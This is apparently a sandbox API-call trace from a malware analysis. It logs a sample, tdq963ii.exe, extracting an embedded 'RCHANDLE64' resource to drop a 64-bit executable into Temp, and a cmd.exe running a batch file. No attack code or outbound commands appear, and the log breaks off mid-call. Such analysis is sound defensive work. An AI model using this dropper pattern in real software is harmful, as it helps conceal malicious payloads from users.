[0119.455] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0119.456] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0119.459] GetLastError () returned 0x0 [0119.459] SetLastError (dwErrCode=0x0) [0119.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0119.463] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0119.463] GetLastError () returned 0x0 [0119.463] SetLastError (dwErrCode=0x0) [0119.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0119.464] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0119.464] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0119.464] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿVÏÝ\x8aäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0119.464] GetLastError () returned 0x0 [0119.464] SetLastError (dwErrCode=0x0) [0119.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0119.464] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0119.464] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0119.464] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿVÏÝ\x8aäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0119.465] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x80) returned 0x5a9240 [0119.751] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0119.751] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0119.751] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a9240) returned 0x80 [0119.751] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0119.752] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0119.752] GetCurrentProcess () returned 0xffffffff [0119.752] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0119.752] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0119.752] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0119.757] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0119.757] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0119.757] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0119.757] LockResource (hResData=0x43c648) returned 0x43c648 [0119.757] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5a9710 [0119.758] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.776] GetLastError () returned 0x20 [0119.776] GetLastError () returned 0x20 [0119.776] SetLastError (dwErrCode=0x20) [0119.776] GetLastError () returned 0x20 [0119.776] SetLastError (dwErrCode=0x20) [0119.776] GetLastError () returned 0x20 [0119.776] SetLastError (dwErrCode=0x20) [0119.776] GetLastError () returned 0x20 [0119.777] SetLastError (dwErrCode=0x20) [0119.777] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1000) returned 0x5a9730 [0119.777] GetLastError () returned 0x20 [0119.777] SetLastError (dwErrCode=0x20) [0119.777] GetLastError () returned 0x20 [0119.777] SetLastError (dwErrCode=0x20) [0119.777] GetLastError () returned 0x20 [0119.777] SetLastError (dwErrCode=0x20) [0119.778] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0119.778] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0119.784] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8810 | out: hHeap=0x590000) returned 1 [0119.785] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0119.785] ExitProcess (uExitCode=0x1) [0119.786] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a70b0 | out: hHeap=0x590000) returned 1 Process: id = "134" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x38ccf000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 611 os_tid = 0x5cc Thread: id = 617 os_tid = 0xa48 Thread: id = 624 os_tid = 0xb34 Process: id = "135" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x37cba000" os_pid = "0xb10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 619 os_tid = 0xa90 [0132.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3af79c | out: lpSystemTimeAsFileTime=0x3af79c*(dwLowDateTime=0x115446e0, dwHighDateTime=0x1d68287)) [0132.682] GetCurrentProcessId () returned 0xb10 [0132.682] GetCurrentThreadId () returned 0xa90 [0132.682] GetTickCount () returned 0x1151b5e [0132.682] QueryPerformanceCounter (in: lpPerformanceCount=0x3af794 | out: lpPerformanceCount=0x3af794*=25302136919) returned 1 [0132.683] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0132.683] __set_app_type (_Type=0x1) [0132.683] __p__fmode () returned 0x770331f4 [0132.683] __p__commode () returned 0x770331fc [0132.683] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0132.684] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0132.684] GetCurrentThreadId () returned 0xa90 [0132.684] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa90) returned 0x60 [0132.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.684] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0132.684] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.685] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.685] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3af72c | out: phkResult=0x3af72c*=0x0) returned 0x2 [0132.685] VirtualQuery (in: lpAddress=0x3af763, lpBuffer=0x3af6fc, dwLength=0x1c | out: lpBuffer=0x3af6fc*(BaseAddress=0x3af000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.685] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x3af6fc, dwLength=0x1c | out: lpBuffer=0x3af6fc*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.685] VirtualQuery (in: lpAddress=0x2b1000, lpBuffer=0x3af6fc, dwLength=0x1c | out: lpBuffer=0x3af6fc*(BaseAddress=0x2b1000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.685] VirtualQuery (in: lpAddress=0x2b3000, lpBuffer=0x3af6fc, dwLength=0x1c | out: lpBuffer=0x3af6fc*(BaseAddress=0x2b3000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.685] VirtualQuery (in: lpAddress=0x3b0000, lpBuffer=0x3af6fc, dwLength=0x1c | out: lpBuffer=0x3af6fc*(BaseAddress=0x3b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0132.685] GetConsoleOutputCP () returned 0x1b5 [0132.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0132.685] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0132.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.686] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.686] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0132.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.686] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.687] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.687] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0132.687] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.687] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.688] GetEnvironmentStringsW () returned 0x454068* [0132.688] GetProcessHeap () returned 0x440000 [0132.688] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xaca) returned 0x454b40 [0132.688] FreeEnvironmentStringsW (penv=0x454068) returned 1 [0132.688] GetProcessHeap () returned 0x440000 [0132.688] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0x450d20 [0132.688] GetEnvironmentStringsW () returned 0x454068* [0132.688] GetProcessHeap () returned 0x440000 [0132.688] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xaca) returned 0x455618 [0132.689] FreeEnvironmentStringsW (penv=0x454068) returned 1 [0132.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ae69c | out: phkResult=0x3ae69c*=0x68) returned 0x0 [0132.689] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x0, lpData=0x3ae6a8*=0x0, lpcbData=0x3ae6a0*=0x1000) returned 0x2 [0132.689] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x4, lpData=0x3ae6a8*=0x1, lpcbData=0x3ae6a0*=0x4) returned 0x0 [0132.689] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ae6a4, lpData=0x3ae6a8, lpcbData=0x3ae6a0*=0x1000 | out: lpType=0x3ae6a4*=0x0, lpData=0x3ae6a8*=0x1, lpcbData=0x3ae6a0*=0x1000) returned 0x2 [0132.689] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ae6a4, 